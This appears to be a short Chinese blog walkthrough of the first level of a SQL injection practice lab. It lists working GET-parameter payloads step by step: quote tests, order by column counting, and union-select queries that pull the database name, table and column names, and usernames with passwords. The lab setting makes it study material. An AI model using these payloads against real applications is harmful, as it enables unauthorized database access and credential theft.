Less-1

短短max發表於2024-10-01

GET_單引號_字元型注入

0x01 判斷注入型別

?id=1
?id=1'
?id=1"

'單引號報錯
to use near ''1'' LIMIT 0,1' at line 1
'1'' LIMIT 0,1
'1''
輸入的單引號寫入了查詢語句

存在,GET,單引號注入

0x02 獲取回顯欄位數

?id=1'order by 4--+
報錯,說明有3列

0x03 獲取資料庫名

?id=-1'union select 1,database(),user()--+
得到security資料庫

0x04 獲取表名

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"--+

0x05 獲取列名

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"--+

0x06 獲取資料

?id=-1'union select 1,2,group_concat(username,password) from users--+

參考連結:
https://www.jianshu.com/p/b5ab19751955

相關文章